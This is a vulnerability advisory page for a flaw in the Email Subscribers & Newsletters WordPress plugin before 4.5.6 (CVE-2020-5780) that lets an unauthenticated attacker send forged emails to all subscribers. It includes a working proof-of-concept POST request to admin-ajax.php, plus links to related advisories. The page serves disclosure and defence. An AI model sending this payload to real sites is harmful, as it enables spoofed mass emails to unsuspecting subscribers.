Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:CF3F71C2-6DE2-4C8C-B7C4-29A63971777D
HistorySep 10, 2020 - 12:00 a.m.

Email Subscribers & Newsletters < 4.5.6 - Unauthenticated email forgery/spoofing

2020-09-1000:00:00
wpscan.com
10
JSON

It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 222 action=admin_init&broadcast;_data[id]=999&ig;_es_broadcast_submitted=submitted&broadcast;_data[subject]=test999&broadcast;_data[body]=body-content&broadcast;_data[list_ids]=2&broadcast;_data[meta][scheduling_option]=schedule_now

CPENameOperatorVersion
email-subscriberslt4.5.6

Related

wpexploit 1
threatpost 1
cve 1
openvas 1
nessus 1
prion 1
wpexploit
wpexploit
Email Subscribers & Newsletters < 4.5.6 - Unauthenticated email forgery/spoofing
2020-09-10 00:00:00
threatpost
threatpost
WordPress Plugin Flaw Allows Attackers to Send Forged Emails
2020-09-11 16:34:02
cve
cve
CVE-2020-5780
2020-09-10 15:15:00
openvas
openvas
WordPress Email Subscribers Plugin < 4.5.6 Email Forgery Vulnerability
2020-09-14 00:00:00
nessus
nessus
WordPress Plugin 'Email Subscribers & Newsletters' < 4.5.6 Email Forgery/Spoofing Vulnerability.
2020-09-14 00:00:00
prion
prion
Design/Logic Flaw
2020-09-10 15:15:00
JSON
Related for WPVDB-ID:CF3F71C2-6DE2-4C8C-B7C4-29A63971777D
wpexploit1threatpost1cve1openvas1nessus1prion1